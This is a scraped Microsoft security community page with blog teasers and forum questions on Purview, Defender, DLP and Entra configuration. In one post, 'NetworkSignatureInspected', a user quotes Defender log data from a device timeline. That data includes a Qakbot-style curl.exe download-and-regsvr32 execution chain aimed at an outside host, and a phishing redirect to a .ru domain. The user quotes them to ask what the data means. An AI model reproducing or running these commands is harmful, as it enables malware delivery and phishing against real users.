Security and AI Essentials
Protect your organization with AI-powered, end-to-end security.
Defend Against Threats
Get ahead of threat actors with integrated solutions.
Secure All Your Clouds
Protection from code to runtime.
Secure All Access
Secure access for any identity, anywhere, to any resource.
Protect Your Data
Comprehensive data security across your entire estate.
Recent Blogs
6 MIN READ
Microsoft Defender Monthly news - December 2025 Edition
This is our monthly "What's new" blog post, summarizing product updates and various new assets we released over the past month across our De...
Dec 04, 2025 · 185 Views · 0 Likes · 0 Comments
5 MIN READ
Most DIY security data lakes start with good intentions—promising flexibility, control, and cost savings. But in reality, they lead to endless data ingestion fixes, schema drift battles, and soaring ...
Dec 03, 2025 · 203 Views · 0 Likes · 0 Comments
22 MIN READ
I will start this blog post by thanking my Secure AI GBB Colleague Hiten Sharma for his contributions to this Tech Blog as a peer-reviewer.
Microsoft Defender for AI (part of Microsoft Defender) he...
Dec 03, 2025 · 525 Views · 1 Like · 0 Comments
We have reviewed the new settings in Microsoft Edge version 143 and determined that there are no additional security settings that require enforcement. The Microsoft Edge version 139 security baselin...
Dec 03, 2025 · 185 Views · 0 Likes · 1 Comment
Recent Discussions
Cross-Tenant Purview Scan of Fabric Lakehouse fails to ingest Sub-items (Delta Tables)
Environment: Tenant 1 (consumer) runs Azure Purview (Microsoft Purview Data Map). Tenant 2 (provider) runs Microsoft Fabric (capacity + workspaces). Architecture: Purview in Tenant 1 is scanning Fabric in Tenant 2 via the "Fabric" data source using the Azure Auto-Resolve Integration Runtime.

The issue: I can successfully scan and see item-level metadata (e.g., workspace name, lakehouse name). However, I am getting zero sub-item visibility: no Delta tables, no columns, and no sub-item lineage are being ingested into Purview.

Configuration verified:
- Service principal (SPN): created an app registration in Tenant 2 (the Fabric tenant).
- Permissions: the SPN is a Member (and I tested Admin) of the target Fabric workspace.
- Fabric admin settings (Tenant 2): "Allow service principals to use read-only admin APIs" enabled for the SPN's security group; "Enhance admin APIs responses with detailed metadata" enabled; "Enhance admin APIs responses with DAX and mashup expressions" enabled.

My specific questions for the product team / MVPs / members:
1. Authentication flow: for sub-item ingestion (Delta tables) to work cross-tenant, is it sufficient for the SPN to be a standard app registration in Tenant 2 (provider), or does Fabric require the "cross-tenant access" (guest user) flow, where a shadow SPN is created via the specific trusted external tenants configuration?
2. API limitation: is the "enhanced metadata" API payload (metadata/subartifacts) restricted to same-tenant calls only during the current preview? I suspect the API is returning a standard payload instead of the enhanced one due to the cross-tenant boundary.
3. Workaround: has anyone successfully forced ingestion of Delta tables cross-tenant by using the Apache Atlas REST API to manually inject the schema entities, or is there a specific hidden toggle in the Fabric admin portal (perhaps specifically for "external principals") that I am missing?

Workaround Enabling Purview Data Quality & Profiling for Cross-Tenant Microsoft Fabric Assets
The Challenge: Cross-Tenant Data Quality Blockers
Like many of you, I have been managing a complex architecture where Microsoft Purview sits in Tenant A and Microsoft Fabric resides in Tenant B. While we can achieve basic metadata scanning (with some configuration), I hit a hard wall when trying to enable Data Quality (DQ) scanning. Purview's native Data Quality scan for Fabric currently faces limitations in cross-tenant scenarios, preventing us from running profiling or applying DQ rules directly on the remote Delta tables.

The Experiment: A "Governance Staging" Architecture
Rather than waiting for a native API fix, I conducted an experiment to bridge this gap using a data-staging approach. The goal was to bring the data itself into the same tenant as Purview to unlock the full DQ engine.

The solution steps:
1. Data movement (Tenant B to Tenant A): inside the Fabric workspace (Tenant B), I created a Fabric data pipeline and used it to export the critical Delta tables as Parquet files to an ADLS Gen2 account located in Tenant A (the same tenant as Purview). Note: you can schedule this to run daily to keep the "governance copy" fresh.
2. Native scanning (Tenant A): I registered this ADLS Gen2 account as a source in Purview. Because both Purview and the ADLS account are in the same tenant, the scan was seamless, fast, and required no complex authentication hurdles.
3. Activating Data Quality: once the Parquet files were scanned, I attached these assets to a Data Product in the Purview Data Governance portal.

The results were immediate and successful. Because the data now resides on a fully supported, same-tenant ADLS Gen2 surface:
✅ Data profiling: I could instantly see column statistics, null distributions, and value patterns.
✅ DQ rules: I was able to apply custom logic and business rules to the data.
✅ Scans: the DQ scan ran successfully, generating a Data Quality score for our Fabric data.
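Step 1 above runs as a Fabric data pipeline, but the "governance copy" pattern itself is just a scheduled, overwriting copy with a record of what was refreshed. Below is a minimal, illustrative sketch in plain Python: the local paths are hypothetical stand-ins for the OneLake export and the same-tenant ADLS Gen2 container, and a real implementation would use the Fabric pipeline or the Azure Storage SDK instead.

```python
import json
import shutil
import time
from pathlib import Path

def stage_tables(source_dir: str, staging_dir: str) -> dict:
    """Copy exported Parquet files into a same-tenant staging area
    and write a manifest so each refresh is traceable."""
    src, dst = Path(source_dir), Path(staging_dir)
    dst.mkdir(parents=True, exist_ok=True)
    copied = []
    for f in sorted(src.glob("*.parquet")):
        shutil.copy2(f, dst / f.name)  # overwriting keeps the governance copy fresh
        copied.append(f.name)
    manifest = {
        "refreshed_at": time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime()),
        "files": copied,
    }
    (dst / "_manifest.json").write_text(json.dumps(manifest, indent=2))
    return manifest

# Example with hypothetical paths:
# stage_tables("/lake/export/sales", "/adls/governance-staging/sales")
```

Keeping the copy overwrite-based (rather than append-based) matches the intent here: Purview scans a point-in-time snapshot, not a history.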
Conclusion: While we await native cross-tenant "live view" support for DQ in Fabric, this workaround works today. It allows you to leverage the full power of Microsoft Purview's Data Quality engine immediately. If you are blocked by tenant boundaries, I highly recommend setting up a lightweight "governance staging" container in your primary tenant. Has anyone else experimented with similar staging patterns for governance? Let's discuss below.

[Solved] Purview Unified Catalogue Gov Domains Numeric Prefixing
Has anyone tried numeric prefixing for governance domains in Purview?

Context: we introduced a structured numeric prefixing system for governance domains in Microsoft Purview to make hierarchical sorting more intuitive.

What we did: parent domains use a base prefix ending in .00 (e.g., 02.00 Group). Child domains are numbered sequentially (e.g., 02.01 Directorate, 02.01.01 Team).

Why: Purview sorts domains alphabetically, which caused child domains (e.g., 02.01) to appear above their parent (02 Group). Adding .00 ensures parents always sort before children, creating a clear hierarchy.

How it works:
- Top-level groups: 02.00
- Directorates: 02.01, 02.02
- Teams/units: 02.01.01

This approach guarantees correct sorting, a clear hierarchy, and scalability for future additions.

Questions for the community: has anyone else implemented a similar numeric prefixing approach in Purview? Do you think this is a good idea for maintaining clarity and scalability? Any alternative strategies you've found effective?

Application filter in the activity explorer no longer populated correctly?
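Returning to the numeric-prefixing thread above: the sorting behavior the scheme relies on can be checked locally, since an alphabetical listing is modeled by a plain string sort. The domain names below are made up for illustration.

```python
# Governance domain names using the ".00 parent" convention (made-up names).
domains = [
    "02.01 Directorate A",
    "02.00 Group",
    "02.01.01 Team X",
    "02.02 Directorate B",
]

# Purview lists domains alphabetically; a plain string sort models that.
ordered = sorted(domains)
print(ordered)

# The ".00" suffix makes the parent compare lower than any "02.01..." child,
# so the parent always heads its block:
assert ordered[0] == "02.00 Group"
```

One caveat worth noting: the scheme only stays correct if every segment keeps a fixed two-digit width. With mixed widths, lexicographic order puts "02.10" before "02.2"; with consistent padding, "02.10" correctly follows "02.09".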
To distinguish between discovery findings in a setup that has both endpoint DLP and the Information Protection scanner deployed, the "Application" filter in activity explorer is typically used. It seems that the filter behavior recently changed and the list of applications the filter offers is built incorrectly: 'Microsoft Purview Information Protection Scanner' is no longer listed, although documents with that property are present. The filter options are normally populated from the properties of documents in range, and I have verified that documents discovered by the MIP scanner exist. I am wondering whether more people are seeing this and whether a workaround is available.

TLS 1.1 is set as a recommended value in the latest security baseline
In the latest security baseline for Windows 11 24H2, the following item is set to "Use TLS 1.1 and TLS 1.2"; could you please explain the reason for this? (Source: Microsoft Security Compliance Toolkit 1.0 from the official Microsoft Download Center.)

Windows Components\Internet Explorer\Internet Control Panel\Advanced Page
Turn off encryption support
Enabled: Use TLS 1.1 and TLS 1.2

Generally, I believe TLS 1.1 should no longer be used, and that "TLS 1.2 and TLS 1.3" would be better from a security standpoint.

46 Views · 3 Likes · 1 Comment

Bitdefender active mode, configure MDE passive mode
Hi, we have a scenario where a client currently has Bitdefender in active mode and uses it to manage their endpoints, and now plans to use Defender for Endpoint in passive mode on those endpoints (Windows 11/Server).
- How do we configure MDE in passive mode, step by step?
- We have 500 devices; how do we onboard them to MDE step by step under co-management?
- While MDE is in passive mode, are there any performance issues alongside a third-party antivirus solution?

Disable Defender for Cloud Apps alerts
Hi all, we just enabled Defender for Cloud Apps in our environment (about 500 clients). We started by setting about 300 apps to "Unsanctioned". Now we are flooded with alerts, mainly "Connection to a custom network indicator on one endpoint" and "Multi-stage incident on multiple endpoints" when a URL is blocked on several clients. Is there a way to disable the alerts for this kind of block? I tried creating a suppression rule but didn't manage to get it working; I don't know whether it is not possible or I made a mistake. Since Defender for Cloud Apps creates an indicator for every app I want to block, I could open every single indicator and disable the alert there, but that's a few hundred indicators and we plan to extend the usage. Can I centrally disable alerts for custom indicators? Thanks & cheers

3.8K Views · 0 Likes · 6 Comments

Migrating DLP Policies from one tenant to other
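On the custom-indicator question above: the Defender for Endpoint indicators API (POST against api.securitycenter.microsoft.com/api/indicators) exposes a per-indicator generateAlert flag, so alert generation can in principle be toggled in bulk by re-submitting indicators from a script rather than clicking through each one. This is a hedged sketch; verify the exact field names, action values, and your app registration's Ti.ReadWrite permission against the current API documentation before relying on it.

```python
import json
import urllib.request

API = "https://api.securitycenter.microsoft.com/api/indicators"

def build_update(token: str, indicator_value: str, title: str) -> urllib.request.Request:
    """Build a submit/update request that re-posts a URL indicator as
    Block with alert generation turned off (generateAlert=False)."""
    body = {
        "indicatorValue": indicator_value,
        "indicatorType": "Url",
        "action": "Block",
        "generateAlert": False,
        "title": title,
        "description": "Unsanctioned app indicator; alerts suppressed",
    }
    return urllib.request.Request(
        API,
        data=json.dumps(body).encode(),
        headers={"Authorization": f"Bearer {token}",
                 "Content-Type": "application/json"},
        method="POST",
    )

# Example with hypothetical values (requires a valid MDE API token):
# req = build_update("<access token>", "badapp.example.com", "Blocked app")
# urllib.request.urlopen(req)
```

Looping this over the list of unsanctioned-app indicators (fetched from the same endpoint with GET) would suppress the per-indicator alerts centrally while keeping the blocks in place.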
Has anyone successfully migrated DLP policies from a dev tenant (like contoso.onmicrosoft.com) to a production tenant (paid license with custom domain) in Microsoft Purview without third-party tools? We're open to using PowerShell, Power Automate, or other Microsoft technologies, such as exporting policies via PowerShell cmdlets from the source tenant, then importing/recreating them in the target tenant using the Microsoft Purview compliance portal or the Security & Compliance PowerShell module. Details: the dev tenant has several active DLP policies across Exchange, Teams, and endpoints that we need to replicate exactly in prod, including sensitive info types, actions, and conditions. Is there a built-in export/import feature, a sample script, or a Power Automate flow for cross-tenant migration? Any gotchas with licensing or tenant-specific configs?

How to apply sensitivity labels to external emails received in my Outlook?
I have created a sensitivity label and an auto-labeling policy that applies the label when an email contains sensitive information. When an internal user sends the email, the label is applied correctly. But when I receive an email with sensitive information from an external user, the label is not applied. How can I apply the sensitivity label to emails that come from external users?

MDE use of Certificate based IoC not working
I have been trying to use MDE IoCs with certificates, as per the following link: https://learn.microsoft.com/en-us/defender-endpoint/indicator-certificates#create-an-indicator-for-certificates-from-the-settings-page

This is on a demo tenant with full M365 E5 licenses and the vulnerability trial enabled just in case. Test devices are:
- Windows 11 with latest updates, domain joined and managed by Intune
- MDE onboarded and active with AV
- Network protection in block mode
- Cloud-delivered protection enabled
- File hash enabled
- In the Defender portal, Settings > Endpoints > Advanced settings: all options enabled

I am testing with Firefox, both the installer and the application .exe after installation. I extracted the leaf certificate from both of these .exe files using the helpful information in the following link: https://www.linkedin.com/pulse/microsoft-defender-missing-manual-how-actually-create-adair-collins-paiye/

I then uploaded the certs into the Defender portal (Settings > Endpoints > IoC > Certificates), set to "Block and remediate".

Issue: it's been 24 hours and nothing happens on the client devices. In the Defender portal, under Assets > Devices > device timeline, I can see the Firefox processes, but at no point is the installer or the application blocked. Have I misunderstood how the feature works? Has anyone else managed to get this to work? Advice appreciated. Thanks, Warren

Customized Oversharing Dialog not working for Exchange DLP
Hi team, when I enable the policy tip as a dialog with custom content, it is not working. I'm testing this option in the new Outlook, and this is my JSON file:

{
  "LocalizationData": [
    {
      "Language": "en-us",
      "Title": "Add a title",
      "Body": "Add the body",
      "Options": [
        "I have a business justification",
        "This message doesn't contain sensitive information",
        "Business justification"
      ]
    }
  ],
  "HasFreeTextOption": "true",
  "DefaultLanguage": "en-us"
}

It's not working in the old Outlook either: no policy tips, no override option on my old Outlook version.

Dynamic group membership rules stopped working
We've been using the following dynamic membership rule to check if a user is a member of another group:

user.memberOf -any (group.objectId -in ['2b930be6-f46a-4a70-b1b5-3e4e0c483fbf'])

The group is an Active Directory group that is represented in Entra with the stated Entra group object ID. The validation fails for every user. It seems that all our dynamic groups are affected and have stopped working. Have you seen this before? Thanks.

Microsoft Purview Roles for Data Consumers in a Data Mesh & Data Democratisation Environment
Recommended Microsoft Purview Roles for Data Consumers in a Data Mesh & Data Democratisation Environment

I'm seeking guidance on whether the following set of Microsoft Purview roles is appropriate for typical data consumers within a Data Mesh-aligned organisation. The approach aims to support data democratisation while maintaining least-privilege access. Data consumers (all users) would be placed into a dedicated security group assigned to these roles, ensuring they have the best possible search experience across the Microsoft Purview Unified Catalogue, Data Map, and Data Health features.

Unified Catalog Settings
- Global Catalog Reader: provides read-only visibility of all catalogued assets across the organisation. This role supports governance, compliance, and data discovery without granting modification rights. Using Global Catalog Reader simplifies onboarding and improves usability by giving users a consistent view of published business concepts and data products across all governance domains. Without it, visibility must be managed domain by domain through roles such as Governance Domain Reader or Local Catalog Reader, which increases administrative effort and limits discoverability. Sensitive domains can still apply additional scoped roles where required.
- Data Health Reader: allows users to view data health metrics such as completeness, freshness, and anomaly indicators. This supports data stewards, quality teams, and analysts in monitoring reliability without the ability to change data or rules.

Unified Catalog Governance Domain Roles
- Data Quality Reader: provides insight into data quality rules and results within a governance domain. Useful for users who need to understand quality issues or compliance status without editing capabilities.
- Data Profile Reader (conditional): enables access to profiling information such as distributions, null counts, and detected patterns. However, profiling data may reveal sensitive information, so this role is best reserved for trusted analysts or stewards rather than being broadly granted to all data consumers.

Data Map Role Assignments
- Data Reader: grants read-only access to metadata and lineage across the data map. This transparency is important for impact assessments, understanding dependencies, and supporting governance processes.
- Insights Reader: provides access to Purview Insights dashboards, including usage statistics, scanning activity, and classification trends. This role is typically valuable for managers or governance leads monitoring adoption and compliance.

Summary: together, these roles aim to give data consumers the access they need for discovery, quality awareness, and understanding lineage, without exposing sensitive data or granting any capability to modify assets. The intention is to follow least-privilege practice while enabling meaningful self-service analytics.

45 Views · 0 Likes · 2 Comments

NetworkSignatureInspected
Hi, whilst looking into something, I was thrown off by a line in a device timeline export with an ActionType of NetworkSignatureInspected, and by its content. I've read the article "Enrich your advanced hunting experience using network layer signals from Zeek", so I understand the basics of the function. I popped over to Sentinel to widen the search as I was initially concerned, but now think it's expected behaviour, as I see the same data from different devices. Can anyone provide clarity on the contents of AdditionalFields where the ActionType is NetworkSignatureInspected and it references, for example, CVE-2021-44228:

${token}/sendmessage`,{method:"post",%90%00%02%10%00%00%A1%02%01%10*%A9Cj)|%00%00$%B7%B9%92I%ED%F1%91%0B\%80%8E%E4$%B9%FA%01.%EA%FA<title>redirecting...</title><script>window.location.href="https://uyjh8.phiachiphe.ru/bjop8dt8@0uv0/#%90%02%1F@%90%02%1F";%90%00!#SCPT:Trojan:BAT/Qakbot.RVB01!MTB%00%02%00%00%00z%0B%01%10%8C%BAUU)|%00%00%CBw%F9%1Af%E3%B0?\%BE%10|%CC%DA%BE%82%EC%0B%952&&curl.exe--output%25programdata%25\xlhkbo\ff\up2iob.iozv.zmhttps://neptuneimpex.com/bmm/j.png&&echo"fd"&®svr32"%90%00!#SCPT:Trojan:HTML/Phish.DMOH1!MTB%00%02%00%00%00{%0B%01%10%F5):[)|%00%00v%F0%ADS%B8i%B2%D4h%EF=E"#%C5%F1%FFl>J<scripttype="text/javascript">window.location="https://

Defender reports no issues on the device, and logs (for example DeviceNetworkEvents or CommonSecurityLog) don't return any hits for the sites referenced. Any assistance with rationalising this would be great, thanks.

Auto-Label Simulation does not simulate your rules exactly
When you're building an auto-labeling rule and run a simulation, don't expect it to fully follow your rule. Let me explain: it doesn't evaluate everything. For example, if your rule says a document must match at least four regex patterns to count as a positive find, the simulation might treat a single match as a positive. Yeah, that's frustrating.

Here's what works better: build your Sensitive Information Type (SIT) and test it against individual documents first. Then create a policy that targets a small subset of data. Run the simulation, then turn on the policy. Check the results in Activity Explorer, which shows real production activity. Why can't the simulation just run the full rule? Good question; we all wish it did.

79 Views · 0 Likes · 1 Comment

How to stop incidents merging under new incident (MultiStage) in defender
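Returning to the auto-labeling post above: the gap it describes (a rule requiring at least four pattern matches while the simulation flags on one) can be mimicked locally when pre-testing a SIT against individual documents, as the post recommends. This is an illustrative sketch with a made-up pattern, not Purview's actual matching engine.

```python
import re

# Hypothetical SIT pattern: a 9-digit account number (made up for illustration).
PATTERN = re.compile(r"\b\d{9}\b")
MIN_COUNT = 4  # the rule's "at least four matches" threshold

def rule_matches(text: str, min_count: int = MIN_COUNT) -> bool:
    """True only when the document meets the full instance-count threshold."""
    return len(PATTERN.findall(text)) >= min_count

doc_one_hit = "Account 123456789 was flagged."
doc_many_hits = " ".join(f"acct {n:09d}" for n in range(1, 5))

# A simulation that fires on any single match would flag both documents;
# the actual rule should flag only the second.
print(rule_matches(doc_one_hit))    # False
print(rule_matches(doc_many_hits))  # True
```

Testing the threshold logic this way on sample documents shows you which hits are true positives under the full rule, before the simulation's looser matching muddies the results.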
Dear all, we are experiencing a challenge with the integration between Microsoft Sentinel and the Defender portal: multiple custom rule alerts and analytic rule incidents are being automatically merged into a single incident named "Multistage". This automatic incident merging affects the granularity and context of our investigations, especially for important custom use cases such as specific admin activities and differentiated analytic logic. Key concerns include:
- Custom rule alerts from Sentinel merging undesirably into a single "Multistage" incident in Defender, causing loss of incident-specific investigation value.
- Analytic rules arising from different data sources and detection logic being merged, although they represent distinct security events needing separate attention.
- Customers require and depend on distinct, non-merged incidents for custom use cases, and the current incident correlation and merging behavior undermines this requirement.

We understand that Defender's incident correlation engine merges incidents based on overlapping entities, timelines, and behaviors, but we would like guidance or configuration best practices to disable or minimize this automatic merging for our custom and analytic rule incidents. Our goal is to maintain independent incidents corresponding exactly to our custom alerts so that hunting, triage, and response workflows remain precise and actionable. Any recommendations or advanced configuration options to achieve this separation would be greatly appreciated. Thank you for your assistance. Best regards

DSPM for AI Data Risk Assessment Question
Hello everyone, my team is creating a POC for DSPM for AI in order to be ready for actual implementations. We have encountered some unexpected issues that we have found no conclusive answers to in the official articles. Everything that follows relates to the Data Risk Assessment feature that comes with DSPM for AI and its SharePoint site scanning.

First, does the assessment feature use both built-in and custom SITs? If so, we need to take custom data types into account in an actual implementation.

Second, we have noticed that no assessment type (including the default one) reads all the sites found in the SharePoint admin center. One of them is probably the root site, as its format is https://<domain name>/ while every other site looks like https://<domain name>/sites/<site name>; another was most likely created by an application; and there are some that do not appear in the list but do appear in the assessment results. All of these sites except the root seem to be up and running, although some show the "request access" page when opened.

Third, we have not found a conclusive answer on the difference between the site-level and item-level scans, because the item-level scan finds and scans even fewer sites. The configuration is as follows:
- Default assessment (all users, all sites, the default option): finds 17/19 sites, and the items scanned do not match the number of items reported on the sites in the SharePoint admin center, yet the number of reported unscanned items is 0.
- Site-level assessment (all users, all sites): finds 11/19 sites, with the same item-count mismatch and 0 reported unscanned items.
- Item-level assessment (all users, no "all sites" option): finds 8/19 sites and scans 4/19, again with the item-count mismatch and 0 reported unscanned items.

To sum up, my team's questions are:
1. Does this solution use custom SITs in addition to built-in ones?
2. What extra configuration is required to scan ALL SharePoint sites for sensitive info using the Data Risk Assessments?
3. What added value does the item-level scan provide?
4. Is any extra configuration besides the enterprise app creation required for item-level scanning on all sites?

Thank you all in advance!

Add Privacy Scrub Service to Microsoft Defender?
Microsoft Defender protects accounts against phishing and malware, but attackers increasingly exploit nuisance data broker sites that publish personal information (names, emails, addresses). These sites are scraped to personalize phishing campaigns, making them harder to detect. I propose a premium Defender add-on that automatically files opt-out requests with major data brokers (similar to DeleteMe).

What are the prerequisites to see Microsoft Secure Score?
My teammate says that even a Basic or Standard M365 license provides Secure Score, which is partly right, as you can see a basic score when opening a tenant in Lighthouse. But if only Standard/Basic licenses are assigned to users, then in the Defender console, under the Exposure menu, Secure Score won't load. I have tried to find a definitive list of prerequisites, but I can't. Copilot said you need at least Business Premium, E3/E5, or Defender P1, which seems to make sense, but I need confirmation. And why do I see some score on the tenant's page in Lighthouse?
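One way to check what a tenant actually exposes, independent of the portal, is the Microsoft Graph secure score API (GET /security/secureScores, which requires the SecurityEvents.Read.All permission). A minimal sketch, assuming you already have an OAuth access token in the GRAPH_TOKEN environment variable; the helper only builds the request, and the network call runs only when a token is present.

```python
import json
import os
import urllib.request

GRAPH_URL = "https://graph.microsoft.com/v1.0/security/secureScores?$top=1"

def build_request(token: str) -> urllib.request.Request:
    """Build the Graph request for the most recent secure score snapshot."""
    return urllib.request.Request(
        GRAPH_URL,
        headers={"Authorization": f"Bearer {token}",
                 "Accept": "application/json"},
    )

if __name__ == "__main__":
    token = os.environ.get("GRAPH_TOKEN")
    if token:
        with urllib.request.urlopen(build_request(token)) as resp:
            latest = json.load(resp)["value"][0]
            print(latest["currentScore"], "/", latest["maxScore"])
    else:
        print("Set GRAPH_TOKEN to query the tenant's secure score.")
```

A 403 response here (rather than an empty result) is a quick signal that the calling identity or tenant lacks the required service plan or permission, which may help narrow down the licensing question.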